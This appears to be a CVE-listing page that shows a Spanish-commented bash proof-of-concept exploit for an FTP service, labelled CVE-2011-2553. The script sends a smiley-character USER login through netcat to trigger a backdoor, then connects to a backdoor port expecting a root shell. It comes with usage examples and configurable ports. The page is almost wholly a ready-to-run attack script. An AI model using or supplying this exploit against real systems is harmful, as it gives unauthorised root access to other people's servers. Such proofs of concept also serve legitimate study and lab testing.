4837 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / escalarprivile.sh SH
#!/bin/bash

# Exploit para CVE-2011-2553 - FTP Service Vulnerability
# Uso: ./exploit.sh <IP> [puerto_ftp] [puerto_backdoor]

IP=${1:-172.17.0.2}
FTP_PORT=${2:-21}
BACKDOOR_PORT=${3:-5000}

# Colores para output
RED='\033[0;31m'
GREEN='\033[0;32m'
YELLOW='\033[1;33m'
NC='\033[0m' # No Color

echo -e "${YELLOW}[*] Exploit para CVE-2011-2553 - FTP Service${NC}"
echo -e "${YELLOW}[*] Objetivo: $IP${NC}"
echo -e "${YELLOW}[*] Puerto FTP: $FTP_PORT${NC}"
echo -e "${YELLOW}[*] Puerto Backdoor: $BACKDOOR_PORT${NC}"
echo ""

check_nc() {
    if ! command -v nc &> /dev/null; then
        echo -e "${RED}[!] Error: netcat no está instalado${NC}"
        echo "Instala con: apt-get install netcat"
        exit 1
    fi
}

exploit_ftp() {
    echo -e "${YELLOW}[*] Conectando al servicio FTP en puerto $FTP_PORT...${NC}"
    
    # Enviar USER con smiley unicode U+263A
    {
        echo -e "USER \u263A"
        echo "PASS exploit"
        echo "QUIT"
    } | nc -w 5 $IP $FTP_PORT
    
    if [ $? -eq 0 ]; then
        echo -e "${GREEN}[+] Payload enviado al servicio FTP${NC}"
    else
        echo -e "${RED}[!] Error al conectar con el servicio FTP${NC}"
        exit 1
    fi
}

connect_backdoor() {
    echo ""
    echo -e "${YELLOW}[*] Intentando conectar a la backdoor en puerto $BACKDOOR_PORT...${NC}"
    echo -e "${GREEN}[+] Si la explotación fue exitosa, deberías tener shell root${NC}"
    echo -e "${YELLOW}[*] Conectando...${NC}"
    echo ""
    
    nc -w 5 $IP $BACKDOOR_PORT || echo -e "${RED}[!] No se pudo conectar a la backdoor${NC}"
}

main() {
    echo -e "${YELLOW}[*] Iniciando explotación...${NC}"
    
    check_nc
    exploit_ftp
    
    echo -e "${YELLOW}[*] Esperando 2 segundos...${NC}"
    sleep 2
    
    connect_backdoor
}

trap 'echo -e "\n${RED}[!] Explotación interrumpida${NC}"; exit 1' INT TERM

if [ $# -eq 0 ]; then
    echo -e "${YELLOW}[*] Uso: $0 <IP> [puerto_ftp] [puerto_backdoor]${NC}"
    echo -e "${YELLOW}[*] Ejemplo: $0 172.17.0.2 21 5000${NC}"
    echo -e "${YELLOW}[*] Ejemplo: $0 172.17.0.2${NC}"
    exit 1
fi

main